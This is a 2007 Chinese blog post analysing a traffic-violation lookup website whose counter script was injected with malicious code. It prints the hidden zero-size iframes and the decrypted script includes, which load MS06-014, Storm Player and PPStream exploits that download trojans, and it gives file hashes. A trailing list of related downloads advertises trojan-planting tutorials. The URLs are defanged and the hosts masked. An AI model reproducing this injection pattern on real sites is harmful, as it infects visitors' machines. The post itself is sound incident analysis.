某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
endurer 原创
2007-10-26 第1版
问题出在该网页所用的计数器代码上:
/---
<script src="hxxp://www.h*c**jj***d.com/wfcx/count/online.asp"></script>
---/
看看hxxp://www.h*c**jj***d.com/wfcx/count/online.asp 的代码:
/---
<iframe src=hxxp://user*.free.77**16*9.net/%73%61%74%61%6E%6C%73%78/sa.htm width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://hack**t*ao.q**yun.net/" width=100 height=0></iframe>
<iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://c*.th*e**c.cn/hacktao/" width=100 height=0></iframe>
<iframe src="hxxp://M**.thIe**c.cn/siyua/" width=100 height=0></iframe>
<iframe src="hxxp://M**.thIe**c.cn/siyua/" width=0 height=0></iframe>
<iframe src="hxxp://b**zsiyua*.5***12j.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/1.htm" width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe width=0 height=0></iframe><iframe width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://w**.m**h*88***88.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe>
document.write("<a href=hxxp://www.h*c**jj***d.com/wfcx/count/ShowOnline.asp title=查看当前在线人数列表><font color=red>当前在线<strong>1</strong>人</font></a>")
---/
挂的东东还真多~
随便找了 hxxp://w**.7***373*4.cn/reg.htm?a 来分析。代码为:
/---
<iframe src=dog.htm width=1 height=0></iframe>
<script src=haha.js></script>
<script src='hxxp://s*89.cnzz.com/stat.php?id=5*372*23&web_id=5*372*23&show=pic2' language='JavaScript' charset='gb2312'></script>
---/
hxxp://w**.7***373*4.cn/dog.htm 的内容为:
/---
<iframe src=hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang width=0 height=0></iframe
---/
hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang 的内容为:
/---
<iframe width='0' height='0' src='hxxp://a*a.1***8d*d.net/aa/kl.htm'></iframe>
<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/12**996*44.js"></script>
---/
hxxp://a*a.1***8d*d.net/aa/kl.htm 的内容为加密的JavaScript代码,经2次解密,得到原始代码,功能是若不存在Cookies变量OK,则创建,并引入漏洞利用代码:
/---
<script src=hxxp:////a*a.1***8d*d.net//aa//1.js><//script>
<script src=hxxp:////a*a.1***8d*d.net//aa//b.js><//script><script src=hxxp:////a*a.1***8d*d.net//aa//pps.js><//script>
---/
并下载 hxxp://down**.1***8d*dI*.net/bb/bd.cab
hxxp://a*a.1***8d*d.net/aa/1.js 功能是利用 MS06014漏洞下载hxxp://down**.1***8d*dI*.net/bb/014.exe,保存为ntuser.com,利用cmd.exe来运行。
文件说明符 : D:/test/014.exe
属性 : A---获取文件版本信息大小失败!
创建时间 : 2007-10-26 13:48:14
修改时间 : 2007-10-26 13:48:14
访问时间 : 2007-10-26 13:14:48
大小 : 37888 字节 37.0 KB
MD5 : 6d84039e781655f16185023a7a7c09e1
SHA1: 3FD12BE3D86DF261438BBED126C507D1E14A90E0
CRC32: 597058c5
Scanned file: 014.exe - Infected |
hxxp://a*a.1***8d*d.net/aa/b.js 利用了暴风影音MPS.DLL ActiveX控件多个远程溢出漏洞(参考:hxxp://www.nsfocus.net/vulndb/10900)
hxxp://a*a.1***8d*d.net/aa/pps.js 利用了ppstream的漏洞
hxxp://down**.1***8d*dI*.net/bb/bd.cab 包含 内容与 014.exe 相同的文件 bd.exe
hxxp://w**.7***373*4.cn/haha.js 利用MS06014漏洞下载hxxp://www.m***ir*7***21.com/mir721.exe
文件说明符 : D:/test/mir721.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-10-26 13:36:26
修改时间 : 2007-10-26 13:36:27
访问时间 : 2007-10-26 13:38:37
大小 : 28376 字节 27.728 KBMD5 : cfc4727cb3e255a15a3da2cdad8e60eb
SHA1: BCC8B3E76852BF6FC0D5661D93868E1F78DC2C38
CRC32: 41011c50
瑞星报为:Win32.SEG.bc
Scanned file: mir721.exe - Infected
|
分享到:
相关推荐
行业资料-交通装置-web挂马网页的识别方法.zip
365网站安全专家网页挂马查杀工具是由宜春启航网络科技有限公司(www.ycqhwl.com)开发的一款网站挂马查杀工具,主要可以查杀各类网页文件中包含的网页木马,并支持数据库木马查杀。也可自由指定查杀网页内容.
防范SQL注入漏洞导致“挂马”.pdf
基于HTTP会话过程跟踪的网页挂马攻击检测方法
基于HTTP会话过程跟踪的网页挂马攻击检测方法.pptx
网页挂马详细步骤教程.pdf
网页挂马详细步骤教程.txt
Web安全开发:SQL注入攻击和网页挂马.pdf
网页挂马代码:X利用方式网页挂马代码:X利用方式
MDecoder是一款自动化的网页挂马分析检测工具。可对网页进行自动化的解密与分析,探测是否被挂马,所挂网页木马利用何种漏洞,并可一键生成专业的挂马分析日志。
网页挂马工作原理完全分析,希望识货的人过来赶快拿啊~~
Flash挂马文章让你学习如何用Flash挂马,非常好的文章,强烈推荐
护卫神·网页挂马清理工具是一款完全免费的专业清理网页挂马代码的绿色实用小工具,主要是针对网页被频繁挂马的情况而研发的小软件,可以帮助您从海量文件中迅速定位挂马代码并清除,减少您的工作量。 Tags: 挂马...
网页,杜绝利用备份文件还原时间差,篡改网页被用户浏览到的可能性。 2.先进合理的组织架构,保证在防止非法webshell上传和篡改的同时,正常远程管理和维护网站不受影响,比如 通过FTP更新发布网站。
基于网页挂马的基础原理进行描述和讲解,对网页挂马有一定的了解
本版本在1.0的基本上增加智能分析功能,对网页文件中存在的可疑代码有红色显示出来!! 修复功能能对网页中所有包含关键字的代码进行清除。 敬请用户朋友提出意见和建议!!
网页挂马分析专家MDecoder,这是一款非常强大的网页挂马分析工具,欢迎下载
本文件内涵多种挂马代码。含有HTM JS调用等等,涉及到网页函数。
基于HTTP会话过程跟踪的网页挂马攻击检测方法